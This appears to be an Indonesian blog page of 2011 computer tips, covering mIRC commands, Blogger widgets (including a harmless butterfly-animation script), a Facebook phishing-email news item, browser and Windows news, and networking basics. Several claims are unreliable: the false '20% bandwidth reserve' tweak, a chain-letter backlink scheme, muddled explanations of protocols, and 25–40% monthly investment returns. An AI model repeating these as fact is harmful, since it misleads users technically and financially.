Pages

Jumat, 25 Maret 2011

Belajar Cara Akses/Menggunakan mIRC

Computer Tricks
 
IRC (Internet Relay Chat) menyediakan suatu cara untuk berkomunikasi secara langsung dengan orang-orang di seluruh dunia. Terdiri dari bermacam-macam “network” (jaringan atau “nets”) IRC server, mesin-mesin untuk menghubungkan pemakai dengan IRC. Nets yang terbesar adalah EFnet (IRC net yang pertama, yang kadang-kadang memiliki lebih dari 32000 pengguna IRC dalam satu saat), Undernet, IRCnet, DALnet, NewNet.
mIRC digunakan untuk chatting, conference, chat ber dua dari  market chatting, berkenalan dengan orang lain yang belum dikenal maupun sudah kenal melalui chane-chanel yang disediakan atau kita ciptakan sendiri.
Buka program mIRC, namun sebelumnya download dulu. bisa di downlowd di http://www.mirc.com/get.html install dan jalankan programnya.
Setelah install buka, masukkan nama dan coballah untuk pilih server dahulu.
Sekalinya Anda berhubungan dengan salah satu IRC server dalam suatu IRC network, Anda dapat bergabung (“join”) dengan salah satu “channel” dan berkomunikasi dengan orang-orang yang ada di dalam channel tersebut. Di dalam EFnet ada lebih dari 12000 channel yang masing-masing memiliki keunikan dan topik tersendiri.
mIRC terdiri dari beberapa server :
Server yang paling banyak digunakan di Indonesia adalah Misalnya pilih Dalnet
1 server terdiri dari beberapa channel
kemudian untuk join channel [ komunitas ] maka channel yang paling populer adalah #bawel
1 channel terdiri dari beberapa orang
setelah dalam channel silahkan chat, jika chat di channel maka message tersebut akan terbaca oleh seluruh orang yang ada didalam channel tersebut. jika ingin private chat dengan seseorang, kita tinggal memilih salah satu nama nick orang lain di sebelah kanan channel kemudian klik 2 kali untuk chat private dengan dia.
dan inilah perintah-perintah umum yang digunakan dalam salah satu channel
Anda ketik yang dijalankan adalah :
/join #bawel Anda bergabung dengan channel bawel
/who #bawel Memberikan informasi pemain di channel bawel
@ = channel op, * = IRC op
halo semua Semua pemain di #bawel akan melihat:
<unyil> halo semua
(Anda tidak perlu mengetikkan nick Anda)
/me anak baik Semua pemain di #bawel akan melihat:
* unyil anak baik
/leave #bawel Anda meninggalkan channel bawel
/whois ucrit Anda akan mendapatkan informasi tentang ucrit, atau nick apa saja yang Anda ketikkan
/whois unyil Informasi mengenai diri Anda (catatan: Anda menggunakan nick unyil)
/nick NickBaru Mengganti nick Anda menjadi “NickBaru”
/msg ucrit halo bos Hanya ucrit yang bisa melihat kalimat Anda (Anda tidak perlu berada di dalam channel yang sama dalam hal ini).
ucrit akan melihat: *unyil* halo bos
/ping #bawel Memberikan informasi tentang “delay” (hambatan bolak balik) antara Anda dengan semua pemain yang ada di #bawel
/ping ucrit Memberikan informasi tentang “delay” (hambatan bolak balik) antara Anda dengan ucrit (seorang saja)
/dcc chat usro Mengirimkan usro permintaan “dcc chat”. usro harus mengetikkan /dcc chat unyil untuk menerima dcc chat tersebut (catatan: Anda menggunakan nick unyil). DCC Chat lebih cepat, bebas hambatan (“lag”) dan bersifat lebih pribadi jika dibandingkan dengan /msg
/msg =usro main air yuk Sekalinya hubungan DCC Chat telah terjalin, Anda bisa menggunakan perintah /msg =nick untuk berbincang-bincang (perhatikan tanda sama dengan [=] sebelum nick). DCC tidak melalui server, jadi tidak akan terpengaruh oleh hambatan-hambatan (lag) dari server, net split, dan lain-lain
usro akan melihat: =unyil= main air yuk
/help Perintah ini biasanya dapat ditemukan hampir di setiap client. Cobalah.
/quit selamat malam! Anda akan “quit” IRC, dengan meninggalkan pesan. Para pemain yang lain akan melihat: *** Signoff: unyil (selamat malam!) (catatan: Anda menggunakan nick unyil)
————————————————————————

demikian penjelasan umum mengenai mIRC, anda bisa coba dulu
karena tanpa mencoba kita tidak akan belajar

Tambah Bandwidth Internet Pada Windows

WINDOWS ANDA TERASA LAMBAT DAN ANDA MERASA TERSIKSA KARENA MENUNGGU LOADING...??

Mungkin sobat pernah mengalami masalah seperti itu. Pada dasarnya OS Windows sudah membatasi Bandwidth untuk koneksi internet sebanyak 20% dari total Bandwidth yang seharusnya bisa maksimal. Tapi jka anda ingin menambah Bandwidth Internet supaya koneksinya terasa lebih cepat dan kencang. Gimana agar bisa seperti itu? yaitu dengan cara mengurangi atau mengosongkan batasan Bandwidth tersebut supaya pada Windows kita bisa beroperasi dengan maksimal.

Caranya simpel, silahkan ikuti petunjuknya seperti dibawah ini:

1. Klik Start pada Windows
2. Klik Run
3. Ketik gpedit.msc
4. kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. kemudian Klik Network
7. setelah terbuka klik QoS Packet scheduler
8. kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limit(%)nya menjadi "0"
11. Klik Apply, OK
12. Kemudian keluar dan Restart komputer

Selamat mencoba.
Gimana....udah terasa enteng loadingnya...thanks

Meningkatkan Traffic Rank and Popularity Dengan Cepat dg Rumus (t=v1+v2)


Ingin meningkatkan traffic pengunjung dan popularity web anda secara cepat dan tak terbatas...? Serahkan pada Saya..., Saya akan melakukannya untuk anda GRATIS...TIS...TIS...!! Klik disini-1 dan disini-2"
Ketika anda baca judul postingan ini mungkin anda bertanya-tanya, apa sih rumus t=vi+v2, dan apa hubungannya sama traffic link, hal ini yang saya alami juga ketika pertama kali baca postingan salah satu sohib saya (=punya pabrik teh), tetapi ketika saya baca postingannya baru saya mengerti dan ternyata rumus t=v1+v2 memang masuk diakal juga, silakan baca lanjutan postingan ini supaya lebih mengerti

---------------- Copy mulai disini------------------


Mohon baca baik-baik lalu terapkan dengan benar....

Sebuah filosofi mengatakan "Honesty is The Best Policy (Kejujuran adalah politik/strategi terbaik)" , inilah yang akan kita buktikan.... apakah konsep kejujuran bisa kita olah menghasilkan traffic dan popularity yang lebih hebat dari konsep rumit para expert webmaster atau pakar SEO..?... Saya yakin bisa asal konsep ini di jalankan dengan benar..., bila ini di terapkan pada web anda sesuai ketentuan maka:
-Web anda akan kebanjiran traffic pengunjung secara luar biasa hari demi hari, tanpa perlu repot-repot memikirkan SEO atau capek-capek promosi keberbagai tempat di dunia internet.
-Web anda akan kebanjiran backlink secara luarbiasa hari demi hari, tanpa perlu repot-repot berburu link keberbagai tempat di dunia internet.

Jika Albert Einstein memakai persamaan e=mc2 untuk menggabungkan potensi masa dan kecepatan cahaya untuk menghasilkan energi nuklir yang luar biasa itu ,maka kita akan memakai persamaant=v1+v2 untuk mnggabungkan potensi web saya dan web anda untuk menghasilkan traffic dan popularity yang luar biasa pula.

Jika Einstein menggunakan atom plutonium dan uranium untuk membuat bom nuklir, maka kita menggunakan Kejujuran dan ketepatan untuk membuat bom traffic dan popularity ini.

Yang perlu anda lakukan adalah ikuti langkah-langkah berikut :

1. Buat posting artikel seperti posting saya ini, atau copy-paste posting ini dari kalimat Copy mulai disini sampai kalimat Selesai, dan juga diberi berjudul : t=v1+v2 ,Cara meningkatkan traffic dan popularity dengan cepat dan alami.

2. Selanjutnya Copy atau buat KALIMAT SAKTI yang ada di bawah nomor 3 ini lalu pasang di web anda pada bagian yang paling mudah dilihat pengunjung, misalnya di bagian atas sidebar

3. Pindahkan atau ganti link atau alamat url posting (disini-1) dengan alamat url anda dan (disini-2) dengan alamat postingan URL saya, untuk mengetahui alamat url posting saya dan posting yang anda buat adalah bisa dengan meng-klik judul/title posting yang kita buat ini lalu copy address bar nya

Berikut tulisan "KALIMAT SAKTI" yang perlu anda pasang di bagian web anda (setelah di ganti link url-nya sesuai ketentuan di atas)

"Ingin meningkatkan traffic pengunjung dan popularity web anda secara cepat dan tak terbatas...? Serahkan pada saya..., Saya akan melakukannya untuk anda GRATIS...!..Klik disini-1 dan disini-2"

-Jadi setelah KALIMAT SAKTI ini di letakan di web anda maka: jika pengunjung meng-klik link disini-1 akan menuju link posting anda, dan jika meng-klik disini-2 akan menuju link posting saya...dan seterusnya kan terus terjadi mata rantai yang tak terputus seperti itu...

4. Selesai, siapkan counter tracker dan pengecek link misalnya sitemeter dan technorati untuk melihat hasil banjir traffic dan linkback web anda.

Apa itu t=v1+t2...?
t : Jumlah traffic yang akan di peroleh web anda dalam suatu hari
v1 : Jumlah pengunjung web anda dalam suatu hari
v2: Jumlah pengunjung yang dimiliki v1 (pengunjung dari pengunjung web anda) dalam suatu hari.

Traffic:
Misalnya, web saya ini atau web anda dalam sehari memiliki rata-rata pengunjung 50 orang.., dan semuanya menerapkan konsep kita ini (KALIMAT SAKTI) dengan benar, dan dari 50 orang itu masing-masing memiliki 50 orang pula pengunjung dari blog-nya , maka web kita akan berpeluang di kunjungi 50 ditambah 50 x 50 orang pada hari itu = 2550 orang , dan akan berpeluang terus meningkat pula hari demi hari ,karena setiap hari selalu ada pengunjung baru di dunia internet, setiap hari juga ada blogger atau web baru di dunia internet...BUKTIKAN

Popularity:
Misalnya, web kita memiliki pengunjung 50 orang dalam suatu hari, dan semuannya menerapkan konsep ini , maka dalam hari itu web anda akan mendapatkan 100 linkback ke web anda, yaitu sebuah link pada KALIMAT SAKTI dan sebuah link pada link saya di kalikan 50. dan akan berpeluang meningkat terus hari demi hari....

Kenapa perlu di buat link link anda dan link saya pada posting...?
...hal ini untuk menjaga keabadian link kita, karena seperti kita tau link pada posting lebih kecil kemungkinannya terhapus....

Bisakah kita berbuat tidak fair atau tidak jujur menyabotase konsep ini, misalnya "menghilangkan semua link asal" lalu di isi dengan web/blog kita sendiri...? ....Bisa, dan konsep ini tidak akan menjadi maksimal untuk membuktikan Kejujuran adalah strategi/politik terbaik.....Tapi saya yakin bahwa kita semua tak ingin menjatuhkan kredibilitas diri sendiri dengan melakukan tindakan murahan seperti itu...

-------------Selesai-------------

Nah gimana tips n triks nya? silakan kalau mau mempraktekkan di blog Saudara dan semoga cara ini berhasil ya....

Flash Banner Maker

Pada postingan kali ini Gue mo sharing info untuk blogger mania yang pingin mempercantik tampilan blognya dengan banner animasi. Layanan ini akan membantu Anda untuk membuat sebuah Flash banner gratis untuk halaman web pribadi, seperti MySpace profil atau blog.

Salah satu contohnya kayak banner link Gue

Sebagai pengantar aja... Anda bebas untuk membuat Flash banner, pilih opsi dan klik tombol "Preview my banner" untuk melihat perubahannya. Bila Anda sudah OK dengan banner tersebut, klik tombol "Get my banner code". Layanan banner Anda akan menghasilkan kode bersama dengan langkah-langkah panduan bagaimana untuk meletakkannya pada halaman Blogger.

OK Sob.. daripada bingung-bingung ngebayanginya langsung aja dipraktekin, caranya silahkan sobat kunjungi http://www.flashbannernow.com/free-flash-banner/, atau klik di sini, nah apabila sudah berada pada halaman tersebut ada beberapa langkah yang harus di lakukan, yaitu mengisi form yang di sediakan:

1. Masukkan kalimat untuk tampilan pertama;
2. Pilih jenis huruf/font;
3. Masukkan kalimat lain untuk tampilan kedua;
4. Pilih jenis animasi text dan background effect;
5. Untuk menampilkan hasilnya pilih Preview my banner;
6. Kalo sudah OK dengan tampilan yang ada, pilih Get my benner code untuk mengcopy code bennernya;
7. Sebagai catatan; Sebelum pilih Get benner code , Anda dapat juga merubah ukuran bennernya terlebih dahulu sesuai keinginan;
8. Klik pada menu copy (untuk mengcopy codenya)

Selesai dah... istirahat sebentar ya.........
Udah fresh...?? sekarang untuk menampilkan code tersebut pada blog ikuti langkah berikut ini.
1. Sign in seperti biasa di blogger dengan ID milik sobat
2. Pilih Tataletak (Layout)
3. Klik Page Element (elemen halaman)
4. Klik Add a Page Element (tambah sebuah element)
5. Pilih HTML/JavaScript
6. Masukkan kode banner yang telah dicopy tadi
7. Klik simpan

Nah..... sekarang Sobat dapat melihat hasilnya OK kan....

Memasang Widget Animasi

KUPU-KUPU TERBANG.........(cuplikan lagu Ebiet G.Ade)
Apa maksudnya?? hehehe...sekedar intermezzo, lagu itu yang menginspirasi gw tuk memberi warna lain pada blog ini. Dan sobat bisa lihat makhluk hasil metamorfosa itu beterbangan sangat indah sekali.

Sobat pingin memilikinya..???
OK, ambil jaringnya dan tangkap kupunya dengan cara berikut ini;

1. Sign in seperti biasa di blogger dengan ID milik sobat
2. Pilih Tataletak (Layout)
3. Klik Page Element (elemen halaman)
4. Klik Add a Page Element (tambah sebuah element)
5. Pilih HTML/JavaScript
6. Masukkan kode HTML berikut ini

<script language="JavaScript1.2" src="http://www.geocities.com/heri_sys89/kupu.js"></script>

7. Tekan tombol Save

dan.....sekarang lihat blog anda, ada makhluk cantik sedang menari-nari dengan indah.
Selamat mencoba ya...

Atau kalau cara di atas belum bisa karena web dari geocities sekarang udah "pindah rumah" sobat mencoba cara berikut ini;

1. Login ke Blogger

2. Masuk ke Tata Letak

3. Trus Edit HTML

4. Trus copy-paste kode java script di bawah ini tepat
sebelum kode </head> untuk mempermudah pencarian tekan ctrl+f.

<script type='text/javascript'>
//<![CDATA[
var Ymax=8; //MAX # OF PIXEL STEPS IN THE "X" DIRECTION
var Xmax=8; //MAX # OF PIXEL STEPS IN THE "Y" DIRECTION
var Tmax=10000; //MAX # OF MILLISECONDS BETWEEN PARAMETER CHANGES

//FLOATING IMAGE URLS FOR EACH IMAGE. ADD OR DELETE ENTRIES. KEEP ELEMENT NUMERICAL ORDER STARTING WITH "0" !!

var floatimages=new Array();
floatimages[0]='http://i363.photobucket.com/albums/oo72/herisys/butterfly.gif';
floatimages[1]='http://i363.photobucket.com/albums/oo72/herisys/butterfly.gif';


//*********DO NOT EDIT BELOW***********
var NS4 = (navigator.appName.indexOf("Netscape")>=0 && parseFloat(navigator.appVersion) >= 4 && parseFloat(navigator.appVersion) < 5)? true : false;
var IE4 = (document.all)? true : false;
var NS6 = (parseFloat(navigator.appVersion) >= 5 && navigator.appName.indexOf("Netscape")>=0 )? true: false;
var wind_w, wind_h, t='', IDs=new Array();
for(i=0; i<floatimages.length; i++){
t+=(NS4)?'<layer name="pic'+i+'" visibility="hide" width="10" height="10"><a href="javascript:hidebutterfly()">' : '<div id="pic'+i+'" style="position:absolute; visibility:hidden;width:10px; height:10px"><a href="javascript:hidebutterfly()">';
t+='<img src="'+floatimages[i]+'" name="p'+i+'" border="0">';
t+=(NS4)? '</a></layer>':'</a></div>';
}
document.write(t);

function moveimage(num){
if(getidleft(num)+IDs[num].W+IDs[num].Xstep >= wind_w+getscrollx())IDs[num].Xdir=false;
if(getidleft(num)-IDs[num].Xstep<=getscrollx())IDs[num].Xdir=true;
if(getidtop(num)+IDs[num].H+IDs[num].Ystep >= wind_h+getscrolly())IDs[num].Ydir=false;
if(getidtop(num)-IDs[num].Ystep<=getscrolly())IDs[num].Ydir=true;
moveidby(num, (IDs[num].Xdir)? IDs[num].Xstep : -IDs[num].Xstep , (IDs[num].Ydir)? IDs[num].Ystep: -IDs[num].Ystep);
}

function getnewprops(num){
IDs[num].Ydir=Math.floor(Math.random()*2)>0;
IDs[num].Xdir=Math.floor(Math.random()*2)>0;
IDs[num].Ystep=Math.ceil(Math.random()*Ymax);
IDs[num].Xstep=Math.ceil(Math.random()*Xmax)
setTimeout('getnewprops('+num+')', Math.floor(Math.random()*Tmax));
}

function getscrollx(){
if(NS4 || NS6)return window.pageXOffset;
if(IE4)return document.body.scrollLeft;
}

function getscrolly(){
if(NS4 || NS6)return window.pageYOffset;
if(IE4)return document.body.scrollTop;
}

function getid(name){
if(NS4)return document.layers[name];
if(IE4)return document.all[name];
if(NS6)return document.getElementById(name);
}

function moveidto(num,x,y){
if(NS4)IDs[num].moveTo(x,y);
if(IE4 || NS6){
IDs[num].style.left=x+'px';
IDs[num].style.top=y+'px';
}}

function getidleft(num){
if(NS4)return IDs[num].left;
if(IE4 || NS6)return parseInt(IDs[num].style.left);
}

function getidtop(num){
if(NS4)return IDs[num].top;
if(IE4 || NS6)return parseInt(IDs[num].style.top);
}

function moveidby(num,dx,dy){
if(NS4)IDs[num].moveBy(dx, dy);
if(IE4 || NS6){
IDs[num].style.left=(getidleft(num)+dx)+'px';
IDs[num].style.top=(getidtop(num)+dy)+'px';
}}

function getwindowwidth(){
if(NS4 || NS6)return window.innerWidth;
if(IE4)return document.body.clientWidth;
}

function getwindowheight(){
if(NS4 || NS6)return window.innerHeight;
if(IE4)return document.body.clientHeight;
}

function init(){
wind_w=getwindowwidth();
wind_h=getwindowheight();
for(i=0; i<floatimages.length; i++){
IDs[i]=getid('pic'+i);
if(NS4){
IDs[i].W=IDs[i].document.images["p"+i].width;
IDs[i].H=IDs[i].document.images["p"+i].height;
}
if(NS6 || IE4){
IDs[i].W=document.images["p"+i].width;
IDs[i].H=document.images["p"+i].height;
}
getnewprops(i);
moveidto(i , Math.floor(Math.random()*(wind_w-IDs[i].W)), Math.floor(Math.random()*(wind_h-IDs[i].H)));
if(NS4)IDs[i].visibility = "show";
if(IE4 || NS6)IDs[i].style.visibility = "visible";
startfly=setInterval('moveimage('+i+')',Math.floor(Math.random()*100)+100);
}}

function hidebutterfly(){
for(i=0; i<floatimages.length; i++){
if (IE4)
eval("document.all.pic"+i+".style.visibility='hidden'")
else if (NS6)
document.getElementById("pic"+i).style.visibility='hidden'
else if (NS4)
eval("document.pic"+i+".visibility='hide'")
clearInterval(startfly)
}
}

if (NS4||NS6||IE4){
window.onload=init;
window.onresize=function(){ wind_w=getwindowwidth(); wind_h=getwindowheight(); }
}

//]]>
</script>

5. Save...

Perancang Template Aplikasi Baru Dari Blogger

Seperti biasanya setiap Pagi aq selalu buka account blogger, tapi ada yang ga' biasa pada tampilan account bloggernya. Sekarang blogger manambahkan Perancangan template pada salah satu menu dasboar-nya, kalau sebelumnya diberi nama Tata letakPerancang Template
Jika anda menggunakan blogger bahasa Indonesia, anda bisa cek di tab Rancangan kemudian tampil paling kanan di sebelah elemen halaman dan edit html tertuliskan Perancangan Template, kemudian diberi tulisan "baru" berwarna merah di sampingnya. Bahkan saat baru kita login ke blogger, kita sudah diberi tahu, ada beberapa pilihan template baru. Yang lebih menarik lagi dari template perancang tersebut, juga disediakan beberapa pilihan background yang bisa kita gunakan tanpa harus mengedit satu persatu template kita seperti sebelumnya.

Untuk merubah template tersebut sobat bisa mengikuti langkah-langkah di bawah ini.

terdapat aplikasi baru, yaitu (Rancangan). Fasilitas baru ini saya ketahui sejak pagi ini (11/6/10), karena setahuku sejak kemarin sore saat masih ngeblog belum ada fasilitas tersebut.


* Login ke account blogger milik sobat
* Klik Rancangan
* Pilih Perancang tamplate
* Disana sobat bisa memilih tamplate terbaru dari blogger, dengan cara mengklik gambar tamplate yang diinginkan
* Kemudian pilih warna bacground yang tersedia dengan cara mengklik gambar tersebut
* Untuk menggunakan tamplate tersebut Klik tombol Apply to Blog yang berada paling atas di sebelah kanan.
* Kemudian klik tombol View Blog untuk melihat perubahannya
* Selesai deh..

Wah... lebih simpel ya, jadi lebih mudah bagi yang baru belajar ngeblog, bisa dicoba sobat moga sukses n tetap semangat ngeblognya.

Virus Baru Yang Mencuri Password Facebook


Bicara masalah virus emang tidak ada habisnya. Sebelumnya aq pernah menginformasikan tentang merebaknya penyebaran message dietRatusan Akun Twitter Terjebak yang berbau spam dan itu menjadikan akun twitter terblokir dan dibajak. Nah... Seiring dengan makin memboomingnya Facebook (FB) di Indonesia, baru-baru ini Hacker mulai mengambil kesempatan dari maraknya penggunaan jejaring social tersebut di internet. Bahkan kali ini mereka mencoba mengelabui 400 juta pengguna Facebook, penyebar virus menggunakan alamat email Facebook. Email tersebut menyatakan bahwa Facebook sedang melakukan maintenance sehingga password Facebook yang dimiliki telah diset-ulang secara tidak sengaja dan mendesak mereka mengklik “attachment” untuk memperoleh izin “login” baru, demikian penjelasan perusahaan pembuat perangkat lunak anti-virus McAfee Inc. Jika “attachment” tersebut dibuka,maka beberapa jenis perangkat lunak jahat akan terunduh, termasuk satu program yang mencuri password, kata McAfee pekan ini.

Dear user of facebook,

Because of the measures taken to provide safety to our clients, your password has been changed. You can find your new password in attached document.

Thanks,
Your Facebook.

Demikian email yang dikirim yang menggunakan alamat profile@facebook.com.

Dalam email tersebut juga disertakan attachment yang harus diklik oleh pengguna. Attachment tersebut berisi akan mengarahkan anda untuk memperbaharui password, yang ternyata secara tidak langsung memberikan password anda kepada sang penyebar virus.

Email tersebut hanya ingin mengambil password Facebook anda agar pengirim virus bisa mengakses akun Facebook anda dan mengambil data-data penting di dalamnya, khususnya data penting yang tertera dalam profil Facebook anda.

Dave Marcus, Direktur McAfee Urusan Komunikasi dan Penelitian Malware, mengatakan ia menduga para peretas akan berhasil menulari jutaan komputer. “Dengan Facebook sebagai daya pikat anda, sebanyak 400 juta orang berpotensi mengklik “attachment” tersebut. Jika 10 persen saja berhasil, maka sebanyak 40 juta orang jadi korban,” katanya.

Tulisan pada surat elektronik tersebut berbunyi “Facebook password reset confirmation customer support”, kata Marcus.ant

Kelebihan dan Kekurangan Firefox 4


Seperti yang kita ketahui bahwa Firefox 4 telah diluncurkan beberapa hari lalu dan setelah di coba ternyataada beberapa kelebihan dan kekurangan dibandingkan dengan produk Firefox sebelumnya.

Firefox versi 4 ini membawa perubahan cukup banyak dari versi sebelumnya, terutama dari segi tampilan yang pertama kali dirasakan oleh pengguna. Ada beberapa perubahan di Firefox versi terbaru ini.

Keunggulan
Poin pertama adalah tab diletakkan dipaling atas, tombol - tombol menu digabung jadi satu (di versi terdahulu : File, Edit, Tools, etc), kemudian bookmark yang dulu ada di toolbar sekarang jadi button, tombol reload dan stop digabung jadi satu, yang terakhir home button yang dipindahkan di sebelah search field.

Fitur baru yang cukup menarik adalah Group Tabs, fitur ini memungkinkan anda mengelompokkan tab-tab anda ke dalam grup-grup. Fitur ini dapat diakses dengan meng-klik tombol Group tabs di sebelah minimize button, atau dengan menekan shorcut Ctrl + Shift + E.

Untuk meng-create group baru cukup block area, dan kemudian tinggal mengelompokkan tab dengan drag tab ke dalam grup tertentu.

Poin kedua, tampilan antar muka Firefox 4 ini juga meningkatkan performanya. Firefox 4 meningkatkan kecepatan saat pengguna membuka browser, mempercepat rendering halaman web dan load javascript lebih cepat dengan javascript engine barunya yang diberi nama JägerMonkey.

Di versi baru ini Firefox terdapat fitur Crash protection, jika ada plugin, misal Adobe Flash, Apple QuickTime, Microsoft Silverlight yang freeze atau crash, hal ini tidak akan mempengaruhi browser. Firefox 4 ini juga sudah mensupport HTML 5.

Kekurangan
Hanya saja ada beberapa add-ons yang versi terbarunya belum kompatibel dengan Firefox 4 ini, misalnya service social bookmarking, Delicious Bookmarks 2.1.106. RealPlayer Browser Record Plugin 1.0 dan NoScript 2.0.9.9 add-ons yang cukup popular juga tidak compatible. Bagi web developer tidak perlu khawatir, karena add-ons "wajib" seperti FireBug, Web Developer, User Agent Switcher atau YSlow berjalan dengan baik.

Kekurangan kecil lain adalah pengguna tidak bisa select address bar langsung dengan menekan tombol F6 (di versi 3.6 bisa), bagi pengguna yang terbiasa jarang menggunakan mouse hal kecil ini cukup menggangu.

Secara keseluruhan, Firefox 4 ini cukup mumpuni untuk bersaing dengan beberapa browser lainnya. Namun salah satu keunggulan dari browser ini adalah, masih didukungnya platform Windows XP, yang justu telah ditinggalkan oleh Microsoft sendiri, melalui Internet Explorer.

Windows 7 SP1 Rilis Tanggal 22 Februari

Gambar: blogspot
WASHINGTON - Microsoft hari ini (13/2) mengumumkan kalau Windows 7 Service Pack 1 (SP1) akan segera tersedia untuk para pengguna PC pada tanggal 22 Februari.

Windows 7 Service Pack 1 dikatakan membawa beberapa perkembangan dari OS Windows 7. Demikian seperti yang dikutip dari PC Authority, Minggu (13/2/2011).

Windows 7 SP1 berisi beberapa update dari Windows 7 yang diluncurkan pada tanggal 22 July 2009. SP1 memiliki tampilan muka yang lebih baik dan kecepatan yang lebih baik.

SP1 menambahkan beberapa perubahan untuk versi beta-nya, yang sudah ada sejak bulan Juli 2010. Perkembangannya sudah termasuk perbaikan untuk masalah keamanana, jaringan dan mobilitas untuk pengguna umum dan kalangan IT profesional.

Windows 7 Service Pack 1 berukuran sebesar 1,2GB. Sementara itu, untuk para pelanggan program Windows Volume Licensing akan bisa mengunduh Windows 7 SP1 pada tanggal 16 Februari

Windows 8 Meluncur Tahun 2012 ?

SAN FRANSISCO - Tidak habis di Windows 7 saja, Microsoft dipastikan masih terus berinovasi mempercanggih sistem operasi terbarunya. Bahkan OS Windows 8 dikabarkan meluncur pada tahun 2012 nanti.

Jika kalender suku maya tidak terbukti dan kiamat tidak hadir pada tahun 2012, Microsoft akan menggelontorkan sistem operasi terbarunya, Windows 8. Tepat, tiga tahun setelah kemunculan Windows 7 tahun ini.

Isu ini berkembang setelah roadmap yanng diduga milik Microsoft berhasil tersebar di internet. Dikutip dari Electronista, Sabtu (21/11/2009), roadmap tersebut digambarkan sesuai dengan ritme peluncurkan produk-produk Microsoft.

Misalnya, untuk meluncurkan Windows Server 2003 dan Windows Server 2003 R2, Microsot membutuhkan waktu selama dua tahun, sejak 2003 hingga 2005. Begitu pula saat meluncurkan Windows Server 2008 dan Windows Server 2008 R2.

Oleh karena itu, Microsoft dianggap tidak membutuhkan waktu yang lama untuk bisa menggelontorkan kembali sistem operasi terbarunya dengan kode nama Windows 8.

Prinsip Kerja Sistem Jaringan Komputer

Pengenalan Dasar Tentang Jaringan 
 
Sinyal listrik maupun sinyal dalam bentuk gelombang elektromagnetik pada suatu jaringan komputer merambat/memancar dengan prinsip kerja sistem jaringan komputer. Agar suatu jaringan dapat saling bertukar informasi data, diperlukan suatu alat yang disebut Modem (Modulator Demodulator) yang berfungsi untuk mengubah sinyal analog menjadi sinyal digital maupun sebaliknya.

Ada 4 komponen utama yang terdapat pada suatu jaringan, yaitu sender (pengirim data informasi), protokol (yang meng-encode dan men-decode data informasi), media transmisi (medium transfer data), dan receiver (penerima data informasi).

Prinsip kerjanya, pertama-tama sender mengirim sinyal informasi menuju receiver melalui protokol encode yang mengubah sinyal digital menjadi sinyal analog kemudian sinyal melalui media transmisi dan melalui protokol kedua di decode kembali menjadi sinyal digital sebelum masuk ke receiver.

Prinsip kerja diatas dapat di analogikan saat orang jepang dan orang inggris sedang chatting melalui internet. Saat orang jepang mengetikkan suatu pesan dalam bahasa jepang maka pesan tersebut akan diubah terlebih dahulu oleh protokol ke dalam bahasa inggris sehingga orang inggris dapat menerima pesan tersebut dalam bahasa inggris dan sebaliknya saat orang inggris membalas pesan orang jepang tersebut maka pesan bahasa inggris akan diubah oleh protokol terlebih dahulu menjadi bahasa jepang sebelum sampai ke orang jepang. Jadi dalam hal ini protokol dapat di istilahkan seperti penerjemah informasi data.
Berdasarkan kriterianya, jaringan komputer dibedakan menjadi 4 yaitu:

1. Berdasarkan distribusi sumber informasi/data
- Jaringan terpusat
Jaringan ini terdiri dari komputer klient dan server yang mana komputer klient yang berfungsi sebagai perantara untuk mengakses sumber informasi/data yang berasal dari satu komputer server

- Jaringan terdistribusi
Merupakan perpaduan beberapa jaringan terpusat sehingga terdapat beberapa komputer server yang saling berhubungan dengan klient membentuk sistem jaringan tertentu.

2. Berdasarkan jangkauan geografis dibedakan menjadi:
- Jaringan LAN
merupakan jaringan yang menghubungkan 2 komputer atau lebih dalam cakupan seperti laboratorium, kantor, serta dalam 1 warnet.

- Jaringan MAN
Merupakan jaringan yang mencakup satu kota besar beserta daerah setempat. Contohnya jaringan telepon lokal, sistem telepon seluler, serta jaringan relay beberapa ISP internet.

- Jaringan WAN
Merupakan jaringan dengan cakupan seluruh dunia. Contohnya jaringan PT. Telkom, PT. Indosat, serta jaringan GSM Seluler seperti Satelindo, Telkomsel, dan masih banyak lagi.

3. Berdasarkan peranan dan hubungan tiap komputer dalam memproses data.
- Jaringan Client-Server
Pada jaringan ini terdapat 1 atau beberapa komputer server dan komputer client. Komputer yang akan menjadi komputer server maupun menjadi komputer client dan diubah-ubah melalui software jaringan pada protokolnya. Komputer client sebagai perantara untuk dapat mengakses data pada komputer server sedangkan komputer server menyediakan informasi yang diperlukan oleh komputer client.

-Jaringan Peer-to-peer
Pada jaringan ini tidak ada komputer client maupun komputer server karena semua komputer dapat melakukan pengiriman maupun penerimaan informasi sehingga semua komputer berfungsi sebagai client sekaligus sebagai server.

4. Berdasarkan media transmisi data
- Jaringan Berkabel (Wired Network)
Pada jaringan ini, untuk menghubungkan satu komputer dengan komputer lain diperlukan penghubung berupa kabel jaringan. Kabel jaringan berfungsi dalam mengirim informasi dalam bentuk sinyal listrik antar komputer jaringan.
- Jaringan Nirkabel (Wireless Network)
Merupakan jaringan dengan medium berupa gelombang elektromagnetik. Pada jaringan ini tidak diperlukan kabel untuk menghubungkan antar komputer karena menggunakan gelombang elektromagnetik yang akan mengirimkan sinyal informasi antar komputer jaringan.
Untuk penjelasan selanjutnya tentang jaringan komputer akan diposting pada tulisan saya berikutnya

Internet Adalah Ladang Sebagai Promosi Bisnis

 Pemanfaatan internet ternyata tidak hanya sebagai sumber informasi, tetapi juga memiliki berbagai manfaat lainnya yang mungkin belum banyak orang yang mengetahuinya. Rata-rata kebanyakan orang di Indonesia menggunakan internet hanya untuk sekedar mencari informasi dan berkomunikasi dengan email atau chatting.

Internet juga memiliki manfaat besar sebagai peluang bisnis dan usaha, sebagai contoh anda yang memiliki sebuah toko buku dapat menjual buku-buku anda tersebut di internet, keuntungan yang dapatkan bahkan bisa 2 bahkan 10 kali lipat dibanding jika anda menjual produk secara offline karena produk yang akan anda jual mencakup seluruh dunia dan bisa dilakukan dengan mudah dan cepat.

Memasarkan produk melalui internet juga tidak membutuhkan modal yang besar bahkan jauh lebih kecil dibanding jika anda membangun sebuah toko atau gedung. Sudah banyak orang-orang yang beralih menjual produk mereka melalui internet karena menurut mereka keuntungan yang diperoleh akan jauh lebih besar.

Di internet juga banyak terdapat berbagai jenis peluang investasi yang cukup menjanjikan. Rata-rata keuntungan yang kita peroleh dengan berinvestasi di suatu perusahaan melalui internet adalah 25% – 40% setiap bulannya dengan masa kontrak bervariasi. Berinvestasi melalui internet tentu memiliki resiko yang sangat besar karena suatu saat suatu perusahaan tempat kita berinvestasi dapat saja bangkrut.

